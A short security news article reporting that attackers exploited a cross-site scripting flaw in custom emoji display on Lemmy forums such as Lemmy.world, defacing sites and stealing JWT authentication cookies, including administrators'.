- “Ducktail” Hackers Target Facebook - September 28, 2023
- Okta Breach: Super Admin Hack - September 24, 2023
- Rackspace: $10.8M Cloud Shift - September 23, 2023
Lemmy’s open source software has been utilized on multiple websites that have recently been attacked by hackers who appear to have leveraged a zero day vulnerability. Open source software called Lemmy is used to build independent news aggregates and discussion boards.
Although each Lemmy-based website is operated by a distinct person or group, thanks to its interconnectedness, visitors of one website can communicate with messages on other servers. At present, there are approximately 1,100 sites with a combined user base of over 850,000.
The Attacks
Recently, someone began taking advantage of a cross-site scripting (XSS) flaw related to the display of customized emoji. A number of well-known websites, including Lemmy.world, the most famous one with over 100,000 visitors, had their pages defaced by the attacker who took advantage of the vulnerability.
The theft of [JWT] authentication cookies led to the compromising of many user accounts on various important Lemmy websites. Administrators possessed a few of these cookies, and they were used to sabotage websites. Only users who clicked on links to rogue pages during the event were at risk, according to Lemmy.world’s administrators.
“All affected users’ private messages and email addresses were accessible to attackers thanks to the stolen cookies,” they continued. It appears that the attacker utilized the altered sites to steer visitors to offensive or frightening information.
Several of Lemmy’s websites had already been taken down before the onslaught started.
Users have been urged to modify their JWT passwords in addition to fixing the issue.